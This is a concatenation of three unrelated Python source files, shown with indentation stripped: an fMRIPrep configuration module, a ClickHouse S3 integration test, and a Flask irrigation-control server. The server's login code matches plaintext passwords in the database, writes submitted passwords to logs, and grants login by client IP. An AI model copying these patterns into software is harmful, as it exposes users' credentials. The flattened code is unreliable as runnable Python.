sloppy = False
"""Run in sloppy mode (meaning, suboptimal parameters that minimize run-time)."""
debug = []
"""Debug mode(s)."""
echo_idx = None
"""Select a particular echo for multi-echo EPI datasets."""
fmriprep_dir = None
"""Root of fMRIPrep BIDS Derivatives dataset. Depends on output_layout."""
fs_license_file = _fs_license
"""An existing file containing a FreeSurfer license."""
fs_subjects_dir = None
"""FreeSurfer's subjects directory."""
layout = None
"""A :py:class:`~bids.layout.BIDSLayout` object, see :py:func:`init`."""
log_dir = None
"""The path to a directory that contains execution logs."""
log_level = 25
"""Output verbosity."""
low_mem = None
"""Utilize uncompressed NIfTIs and other tricks to minimize memory allocation."""
md_only_boilerplate = False
"""Do not convert boilerplate from MarkDown to LaTex and HTML."""
notrack = False
"""Do not monitor *fMRIPrep* using Sentry.io."""
output_dir = None
"""Folder where derivatives will be stored."""
output_layout = None
"""Layout of derivatives within output_dir."""
output_spaces = None
"""List of (non)standard spaces designated (with the ``--output-spaces`` flag of
the command line) as spatial references for outputs."""
reports_only = False
"""Only build the reports, based on the reportlets found in a cached working directory."""
run_uuid = f"{strftime('%Y%m%d-%H%M%S')}_{uuid4()}"
"""Unique identifier of this particular run."""
participant_label = None
"""List of participant identifiers that are to be preprocessed."""
task_id = None
"""Select a particular task from all available in the dataset."""
templateflow_home = _templateflow_home
"""The root folder of the TemplateFlow client."""
work_dir = Path("work").absolute()
"""Path to a working directory where intermediate results will be available."""
write_graph = False
"""Write out the computational graph corresponding to the planned preprocessing."""
_layout = None
_paths = (
"anat_derivatives",
"bids_dir",
"bids_database_dir",
"fmriprep_dir",
"fs_license_file",
"fs_subjects_dir",
"layout",
"log_dir",
"output_dir",
"templateflow_home",
"work_dir",
)
@classmethod
def init(cls):
"""Create a new BIDS Layout accessible with :attr:`~execution.layout`."""
if cls.fs_license_file and Path(cls.fs_license_file).is_file():
os.environ["FS_LICENSE"] = str(cls.fs_license_file)
if cls._layout is None:
import re
from bids.layout import BIDSLayout
if cls.bids_database_dir:
_db_path = cls.bids_database_dir
if not _db_path.exists():
logging.getLogger("cli").warning(
f"Creating PyBIDS database directory: {_db_path}"
)
else:
_db_path = cls.work_dir / cls.run_uuid / "bids_db"
_db_path.mkdir(exist_ok=True, parents=True)
cls._layout = BIDSLayout(
str(cls.bids_dir),
validate=False,
database_path=_db_path,
reset_database=cls.bids_database_dir is None,
ignore=(
"code",
"stimuli",
"sourcedata",
"models",
re.compile(r"^\."),
),
)
cls.bids_database_dir = _db_path
cls.layout = cls._layout
if cls.bids_filters:
from bids.layout import Query
# unserialize pybids Query enum values
for acq, filters in cls.bids_filters.items():
cls.bids_filters[acq] = {
k: getattr(Query, v[7:-4])
if not isinstance(v, Query) and "Query" in v
else v
for k, v in filters.items()
}
if "all" in cls.debug:
cls.debug = list(DEBUG_MODES)
# These variables are not necessary anymore
del _fs_license
del _exec_env
del _nipype_ver
del _templateflow_home
del _tf_ver
del _free_mem_at_start
del _oc_limit
del _oc_policy
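# Sketch (not part of fMRIPrep) of the pybids ``Query`` round-trip performed in
# ``execution.init`` above: the serialized filter values are assumed to look like
# the enum ``repr`` (e.g. "<Query.NONE: 1>"), so the slice ``v[7:-4]`` recovers the
# member name ("NONE") and ``getattr(Query, ...)`` restores the enum. The filter
# contents below are hypothetical; pybids must be importable.
def _example_unserialize_bids_filter():
    from bids.layout import Query

    serialized = {"bold": {"reconstruction": repr(Query.NONE)}}  # "<Query.NONE: 1>"
    restored = {
        key: {
            k: getattr(Query, v[7:-4]) if not isinstance(v, Query) and "Query" in v else v
            for k, v in filters.items()
        }
        for key, filters in serialized.items()
    }
    return restored  # {"bold": {"reconstruction": Query.NONE}}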
class workflow(_Config):
"""Configure the particular execution graph of this workflow."""
anat_only = False
"""Execute the anatomical preprocessing only."""
aroma_err_on_warn = None
"""Cast AROMA warnings to errors."""
aroma_melodic_dim = None
"""Number of ICA components to be estimated by MELODIC
(positive = exact, negative = maximum)."""
bold2t1w_dof = None
"""Degrees of freedom of the BOLD-to-T1w registration steps."""
bold2t1w_init = "register"
"""Whether to use standard coregistration ('register') or to initialize coregistration from the
BOLD image-header ('header')."""
cifti_output = None
"""Generate HCP Grayordinates, accepts either ``'91k'`` (default) or ``'170k'``."""
dummy_scans = None
"""Set a number of initial scans to be considered nonsteady states."""
fmap_bspline = None
"""Regularize fieldmaps with a field of B-Spline basis."""
fmap_demean = None
"""Remove the mean from fieldmaps."""
force_syn = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation."""
hires = None
"""Run FreeSurfer ``recon-all`` with the ``-hires`` flag."""
ignore = None
"""Ignore particular steps for *fMRIPrep*."""
longitudinal = False
"""Run FreeSurfer ``recon-all`` with the ``-logitudinal`` flag."""
medial_surface_nan = None
"""Fill medial surface with :abbr:`NaNs (not-a-number)` when sampling."""
regressors_all_comps = None
"""Return all CompCor components."""
regressors_dvars_th = None
"""Threshold for DVARS."""
regressors_fd_th = None
"""Threshold for :abbr:`FD (frame-wise displacement)`."""
run_reconall = True
"""Run FreeSurfer's surface reconstruction."""
skull_strip_fixed_seed = False
"""Fix a seed for skull-stripping."""
skull_strip_template = "OASIS30ANTs"
"""Change default brain extraction template."""
skull_strip_t1w = "force"
"""Skip brain extraction of the T1w image (default is ``force``, meaning that
*fMRIPrep* will run brain extraction of the T1w)."""
spaces = None
"""Keeps the :py:class:`~niworkflows.utils.spaces.SpatialReferences`
instance keeping standard and nonstandard spaces."""
use_aroma = None
"""Run ICA-:abbr:`AROMA (automatic removal of motion artifacts)`."""
use_bbr = None
"""Run boundary-based registration for BOLD-to-T1w registration."""
use_syn_sdc = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation
in the absence of any alternatives."""
class loggers:
"""Keep loggers easily accessible (see :py:func:`init`)."""
_fmt = "%(asctime)s,%(msecs)d %(name)-2s " "%(levelname)-2s:\n\t %(message)s"
_datefmt = "%y%m%d-%H:%M:%S"
default = logging.getLogger()
"""The root logger."""
cli = logging.getLogger("cli")
"""Command-line interface logging."""
workflow = logging.getLogger("nipype.workflow")
"""NiPype's workflow logger."""
interface = logging.getLogger("nipype.interface")
"""NiPype's interface logger."""
utils = logging.getLogger("nipype.utils")
"""NiPype's utils logger."""
@classmethod
def init(cls):
"""
Set the log level, initialize all loggers into :py:class:`loggers`.
* Add new logger levels (25: IMPORTANT, and 15: VERBOSE).
* Add a new sub-logger (``cli``).
* Logger configuration.
"""
from nipype import config as ncfg
_handler = logging.StreamHandler(stream=sys.stdout)
_handler.setFormatter(logging.Formatter(fmt=cls._fmt, datefmt=cls._datefmt))
cls.cli.addHandler(_handler)
cls.default.setLevel(execution.log_level)
cls.cli.setLevel(execution.log_level)
cls.interface.setLevel(execution.log_level)
cls.workflow.setLevel(execution.log_level)
cls.utils.setLevel(execution.log_level)
ncfg.update_config(
{"logging": {"log_directory": str(execution.log_dir), "log_to_file": True}}
)
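# The ``loggers.init`` docstring above mentions custom log levels 25 (IMPORTANT)
# and 15 (VERBOSE); registering their names is presumably handled elsewhere in the
# module and is not shown in this excerpt. A minimal sketch using the standard
# logging API would be:
def _example_register_custom_levels():
    logging.addLevelName(25, "IMPORTANT")
    logging.addLevelName(15, "VERBOSE")
    # With execution.log_level defaulting to 25, IMPORTANT records and above are
    # emitted while VERBOSE (15) and DEBUG (10) are filtered out.
    logging.getLogger("cli").log(25, "an IMPORTANT message")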
class seeds(_Config):
"""Initialize the PRNG and track random seed assignments"""
_random_seed = None
master = None
"""Master random seed to initialize the Pseudorandom Number Generator (PRNG)"""
ants = None
"""Seed used for antsRegistration, antsAI, antsMotionCorr"""
numpy = None
"""Seed used by NumPy"""
@classmethod
def init(cls):
if cls._random_seed is not None:
cls.master = cls._random_seed
if cls.master is None:
cls.master = random.randint(1, 65536)
random.seed(cls.master) # initialize the PRNG
# functions to set program specific seeds
cls.ants = _set_ants_seed()
cls.numpy = _set_numpy_seed()
def _set_ants_seed():
"""Fix random seed for antsRegistration, antsAI, antsMotionCorr"""
val = random.randint(1, 65536)
os.environ["ANTS_RANDOM_SEED"] = str(val)
return val
def _set_numpy_seed():
"""NumPy's random seed is independant from Python's `random` module"""
import numpy as np
val = random.randint(1, 65536)
np.random.seed(val)
return val
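# Sketch (not part of fMRIPrep): because ``seeds.init()`` seeds Python's ``random``
# module with ``seeds.master`` before drawing the ANTs and NumPy seeds, fixing the
# master seed makes the derived seeds reproducible across runs. The value 2021 is
# an arbitrary example.
def _example_reproducible_seeds():
    seeds.load({"_random_seed": 2021}, init=True)
    first = (seeds.master, seeds.ants, seeds.numpy)
    seeds.load({"_random_seed": 2021}, init=True)
    second = (seeds.master, seeds.ants, seeds.numpy)
    assert first == second  # same master seed, same derived seeds
    return first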
def from_dict(settings):
"""Read settings from a flat dictionary."""
nipype.load(settings)
execution.load(settings)
workflow.load(settings)
seeds.load(settings)
loggers.init()
def load(filename, skip=None):
"""Load settings from file."""
from toml import loads
skip = skip or {}
filename = Path(filename)
settings = loads(filename.read_text())
for sectionname, configs in settings.items():
if sectionname != "environment":
section = getattr(sys.modules[__name__], sectionname)
ignore = skip.get(sectionname)
section.load(configs, ignore=ignore)
init_spaces()
def get(flat=False):
"""Get config as a dict."""
settings = {
"environment": environment.get(),
"execution": execution.get(),
"workflow": workflow.get(),
"nipype": nipype.get(),
"seeds": seeds.get(),
}
if not flat:
return settings
return {
".".join((section, k)): v
for section, configs in settings.items()
for k, v in configs.items()
}
def dumps():
"""Format config into toml."""
from toml import dumps
return dumps(get())
def to_filename(filename):
"""Write settings to file."""
filename = Path(filename)
filename.write_text(dumps())
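# Sketch (not part of fMRIPrep): round-tripping the configuration through a TOML
# file with ``to_filename()`` and ``load()``. The file location is hypothetical;
# ``load()`` skips the read-only ``environment`` section and finishes by calling
# ``init_spaces()``.
def _example_config_roundtrip_toml(tmp_dir):
    config_file = Path(tmp_dir) / "fmriprep.toml"  # hypothetical location
    to_filename(config_file)  # serialize the current settings
    load(config_file)         # restore them (the environment section is skipped)
    return get(flat=True)     # flat view, e.g. {"nipype.nprocs": ...}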
def init_spaces(checkpoint=True):
"""Initialize the :attr:`~workflow.spaces` setting."""
from niworkflows.utils.spaces import Reference, SpatialReferences
spaces = execution.output_spaces or SpatialReferences()
if not isinstance(spaces, SpatialReferences):
spaces = SpatialReferences(
[ref for s in spaces.split(" ") for ref in Reference.from_string(s)]
)
if checkpoint and not spaces.is_cached():
spaces.checkpoint()
# Add the default standard space if not already present (required by several sub-workflows)
if "MNI152NLin2009cAsym" not in spaces.get_spaces(nonstandard=False, dim=(3,)):
spaces.add(Reference("MNI152NLin2009cAsym", {}))
# Ensure user-defined spatial references for outputs are correctly parsed.
# Certain options require normalization to a space not explicitly defined by users.
# These spaces will not be included in the final outputs.
if workflow.use_aroma:
# Make sure there's a normalization to FSL for AROMA to use.
spaces.add(Reference("MNI152NLin6Asym", {"res": "2"}))
cifti_output = workflow.cifti_output
if cifti_output:
# CIFTI grayordinates to corresponding FSL-MNI resolutions.
vol_res = "2" if cifti_output == "91k" else "1"
spaces.add(Reference("fsaverage", {"den": "164k"}))
spaces.add(Reference("MNI152NLin6Asym", {"res": vol_res}))
# Make the SpatialReferences object available
workflow.spaces = spaces
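# Sketch (not part of fMRIPrep): what ``init_spaces()`` does with a typical
# ``--output-spaces`` style string. The spaces chosen here are only an example.
def _example_init_spaces():
    execution.output_spaces = "MNI152NLin2009cAsym:res-2 MNI152NLin6Asym"
    init_spaces(checkpoint=False)
    # workflow.spaces now holds a SpatialReferences with the requested references
    # (the default MNI152NLin2009cAsym is added automatically when missing).
    return workflow.spaces.get_spaces(nonstandard=False, dim=(3,))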
|
test.py
|
import json
import logging
import random
import threading
import os
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance
import helpers.client
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = cluster.minio_client
minio_client.set_bucket_policy(cluster.minio_bucket, json.dumps(bucket_read_write_policy))
cluster.minio_restricted_bucket = "{}-with-auth".format(cluster.minio_bucket)
if minio_client.bucket_exists(cluster.minio_restricted_bucket):
minio_client.remove_bucket(cluster.minio_restricted_bucket)
minio_client.make_bucket(cluster.minio_restricted_bucket)
# Returns content of given S3 file as string.
def get_s3_file_content(cluster, bucket, filename):
    # type: (ClickHouseCluster, str, str) -> str
data = cluster.minio_client.get_object(bucket, filename)
data_str = ""
for chunk in data.stream():
        data_str += chunk.decode()  # stream() yields bytes under Python 3
return data_str
@pytest.fixture(scope="module")
def cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"],
with_minio=True)
cluster.add_instance("dummy", with_minio=True, main_configs=["configs/defaultS3.xml"])
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
run_s3_mock(cluster)
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
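# The tests below all build queries against ClickHouse's s3() table function with
# the same shape; an equivalent helper (hypothetical, shown for clarity only; the
# tests keep their explicit format strings) would be:
def build_s3_insert_query(host, port, bucket, filename, table_format, values, auth=""):
    # auth is either "" or a "'key','secret'," prefix, matching the parametrized tests
    return "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') values {}".format(
        host, port, bucket, filename, auth, table_format, values)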
# Test simple put.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
("'minio','minio123',", True),
("'wrongid','wrongkey',", False)
])
def test_put(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, filename, maybe_auth, table_format, values)
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(cluster, bucket, filename)
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
("'minio','minio123',", True),
("'wrongid','wrongkey',", False)
])
def test_put_csv(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
cluster.minio_host, cluster.minio_port, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(cluster):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
def test_put_get_with_globs(cluster):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}_{}/{}.csv".format(i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i + j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == [
"450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
("'wrongid','wrongkey',", False)
])
def test_multipart_put(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
    # Minimum size of a part is 5 MB for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
    int_data = [[1, 2, 3] for i in range(csv_size_bytes // one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use proxy access logs to count number of parts uploaded to Minio.
proxy_logs = cluster.get_container_logs("proxy1") # type: str
assert proxy_logs.count("PUT /{}/{}".format(bucket, filename)) >= 2
assert csv_data == get_s3_file_content(cluster, bucket, filename)
def test_remote_host_filter(cluster):
instance = cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", cluster.minio_port, cluster.minio_bucket, format)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
"invalid_host", cluster.minio_port, cluster.minio_bucket, format, other_values)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
@pytest.mark.parametrize("s3_storage_args", [
"''", # 1 arguments
"'','','','','',''" # 6 arguments
])
def test_wrong_s3_syntax(cluster, s3_storage_args):
instance = cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3({})".format(s3_storage_args)
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(cluster):
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night+nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
def run_s3_mock(cluster):
logging.info("Starting s3 mock")
container_id = cluster.get_container_id('resolver')
current_dir = os.path.dirname(__file__)
cluster.copy_file_to_container(container_id, os.path.join(current_dir, "s3_mock", "mock_s3.py"), "mock_s3.py")
cluster.exec_in_container(container_id, ["python", "mock_s3.py"], detach=True)
logging.info("S3 mock started")
def test_custom_auth_headers(cluster):
ping_response = cluster.exec_in_container(cluster.get_container_id('resolver'), ["curl", "-s", "http://resolver:8080"])
assert ping_response == 'OK', 'Expected "OK", but got "{}"'.format(ping_response)
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=cluster.minio_restricted_bucket,
file=filename,
table_format=table_format)
instance = cluster.instances["dummy"] # type: ClickHouseInstance
result = run_query(instance, get_query)
assert result == '1\t2\t3\n'
def test_infinite_redirect(cluster):
bucket = "redirected"
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=bucket,
file=filename,
table_format=table_format)
instance = cluster.instances["dummy"] # type: ClickHouseInstance
exception_raised = False
try:
run_query(instance, get_query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
|
nabucodonosor.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import sys
import time
import subprocess
import signal
import json
import requests
import datetime as dt
import logging
import logging.config
import git
from functools import wraps
from Models import *
sys.path.insert(
1, os.path.join(os.environ["BABILONIA_LIBS"], "matricis/SmartIrrigation")
)
from SoilMoistureAnalytics import *
from TelegramAssistantServer import *
from Dashboard import *
from WaterTankManager import *
from Irrigation import *
from Watchdog import *
import simplejson as json
from werkzeug.middleware.dispatcher import DispatcherMiddleware
from flask import (
Flask,
make_response,
Response,
url_for,
redirect,
render_template,
request,
session,
abort,
)
from flask_mqtt import Mqtt
from flask_socketio import SocketIO
from flask_assets import Environment, Bundle
# from croniter import croniter
# from flask_qrcode import QRcode
from sqlalchemy import func, and_
from flask_login import LoginManager, login_required, login_user, logout_user
from flask_caching import Cache
from threading import Thread
# from flask_executor import Executor
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.triggers.cron import CronTrigger
from about import about_system
from management import management
from monitor import monitor
###############################################################################
#################### CONFIGURATION AND INITIALISATION #########################
###############################################################################
QUARANTINE_CACHE = {}
SUPPORT_CACHE = {}
###### create console handler and set level to debug
SERVER_HOME = os.path.dirname(os.path.abspath(__file__))
LOG_DIR = os.path.join(SERVER_HOME, "../log")
COMMON_DIR = os.path.join(SERVER_HOME, "../../common")
os.chdir(SERVER_HOME) # change directory because of log files
with open(os.path.join(SERVER_HOME, "logging.json"), "r") as logging_json_file:
logging_config = json.load(logging_json_file)
if not os.path.exists(LOG_DIR):
os.makedirs(LOG_DIR)
logging.config.dictConfig(logging_config)
logger = logging.getLogger(__name__)
###### reading version
VERSION = subprocess.check_output(
["git", "describe", "--tags", "--always"], cwd=SERVER_HOME
).strip()
###### reading configuration
with open(os.path.join(SERVER_HOME, "config.json"), "r") as config_json_file:
cfg = json.load(config_json_file)
isMqttEnabled = cfg["MODE"]["MQTT"]
isWebEnabled = cfg["MODE"]["WEB"]
OASIS_PROP_FILE = os.path.join(COMMON_DIR, "oasis_properties.json")
with open(OASIS_PROP_FILE, "r") as oasis_prop_file:
oasis_properties = json.load(oasis_prop_file)
###### Server GPIO setup
#
# o V G o X Y o o o o o o o o o o o o o o
# o o o o o o o o o o o o o o o o o o o o
#
wtm = WaterTankManager(logger, cfg)
wtm.monitorTankLevel()
###### Initialisation
app = Flask(__name__, static_url_path="/static")
app.config["MQTT_BROKER_URL"] = cfg["MQTT"]["BROKER"]
app.config["MQTT_BROKER_PORT"] = cfg["MQTT"]["PORT"]
app.config["MQTT_KEEPALIVE"] = cfg["MQTT"]["KEEPALIVE"]
app.config["SQLALCHEMY_DATABASE_URI"] = cfg["SQLALCHEMY_DATABASE_URI"]
app.config["SQLALCHEMY_COMMIT_ON_TEARDOWN"] = True
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
app.config["SECRET_KEY"] = cfg["SECRET_KEY"]
app.config["LOGIN_DISABLED"] = cfg["LOGIN_DISABLED"]
NODE_HOME = os.path.join(os.environ["BABILONIA_HOME"], "node/ino")
ESPMAKE_PARAM = os.path.join(
os.environ["BABILONIA_LIBS"], "makeEspArduino/makeEspArduino.mk"
)
logger.info("BABILONIA_HOME: %s", os.environ["BABILONIA_HOME"])
logger.info("BABILONIA_LIBS: %s", os.environ["BABILONIA_LIBS"])
logger.info("NODE_HOME: %s", NODE_HOME)
cache = Cache(config=cfg["CACHE"])
cache.init_app(app)
# executor = Executor(app)
mqtt = Mqtt(app)
DB.init_app(app)
dashboard = Dashboard(logger, cfg)
analytics = SoilMoistureAnalytics(logger, cfg, oasis_properties)
socketio = SocketIO(app)
assets = Environment(app)
login_manager = LoginManager()
login_manager.init_app(app)
# qrcode = QRcode(app)
if cfg["TELEGRAM"]["ENABLE"]:
logger.info("[TELEGRAM_ASSISTANT] enabled")
telegram = subprocess.Popen(["python3", "TelegramAssistantServer.py"])
def stop_telegram(signum, frame):
telegram.terminate()
logger.info("[TELEGRAM_ASSISTANT] killed")
sys.exit(0)
signal.signal(signal.SIGINT, stop_telegram)
signal.signal(signal.SIGTERM, stop_telegram)
else:
logger.info("[TELEGRAM_ASSISTANT] disabled")
assets.load_path = [
os.path.join(os.path.dirname(__file__), "static/fonts"),
os.path.join(os.path.dirname(__file__), "static"),
]
assets.register(
"3rdpartycss",
"css/3rdparty/bootstrap.css",
"css/3rdparty/dataTables.bootstrap.css",
"css/3rdparty/buttons.bootstrap.css",
"css/3rdparty/select.bootstrap.css",
"css/3rdparty/sticky-footer-navbar.css",
"css/3rdparty/font-awesome.css",
"css/3rdparty/weather-icons.css",
"css/3rdparty/sweetalert.css",
"css/3rdparty/bootstrap-datepicker.css",
"css/3rdparty/bootstrap-switch.min.css",
output="assets/3rdparty.css",
filters="cssmin",
)
assets.register(
"3rdpartyjs",
"js/3rdparty/jquery-2.2.4.js",
"js/3rdparty/js.cookie.js",
"js/3rdparty/jquery-ui.js",
"js/3rdparty/jquery.dataTables.js",
"js/3rdparty/dataTables.bootstrap.js",
"js/3rdparty/dataTables.buttons.js",
"js/3rdparty/buttons.bootstrap.js",
"js/3rdparty/bootstrap-switch.min.js",
"js/3rdparty/bootstrap-datepicker.js",
"js/3rdparty/dataTables.select.js",
"js/3rdparty/popper.min.js",
"js/3rdparty/bootstrap.js",
"js/3rdparty/socket.io.min.js",
"js/3rdparty/moment.js",
"js/3rdparty/sweetalert.min.js",
# 'js/3rdparty/Chart.js',
output="assets/3rdparty.js",
filters="jsmin",
)
def update_server_software():
repo = git.Repo(os.environ["BABILONIA_HOME"])
logger.info("[update_server_software] ignoring local changes")
repo.git.reset("--hard")
logger.info("[update_server_software] geting updates")
repo.remotes.origin.pull()
logger.info("[update_server_software] restarting the service")
subprocess.check_output(["sudo", "service", "nabucodonosor", "restart"])
###############################################################################
############################# MANAGE WEB REQ/RESP #############################
###############################################################################
def check_if_gui_is_enable(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if not isWebEnabled:
return render_template("misc/disabled.html")
return f(*args, **kwargs)
return decorated_function
@login_manager.user_loader
def load_user(username):
return User.query.get(username)
# somewhere to login
@app.route("/login", methods=["GET", "POST"])
@check_if_gui_is_enable
def login():
logger.info("[CLIENT IP] %s", request.remote_addr)
error = None
if cfg["FREE_PASS"]["ACTIVE"] and request.remote_addr in cfg["FREE_PASS"]["IP"]:
logger.info("[Free pass] %s", request.remote_addr)
free_pass_user = User(cfg["FREE_PASS"]["LOGIN"])
login_user(free_pass_user)
return redirect("/")
else:
logger.info("[Free pass] disabled")
if request.method == "POST":
username = request.form["username"]
password = request.form["password"]
registered_user = User.query.filter_by(
USERNAME=username, PASSWORD=password
).first()
print(registered_user)
if registered_user is None:
logger.warning(
"[Invalid Credential] username: %s password: %s", username, password
)
error = "Invalid Credentials. Please try again."
elif registered_user.USERNAME == cfg["FREE_PASS"]["LOGIN"]:
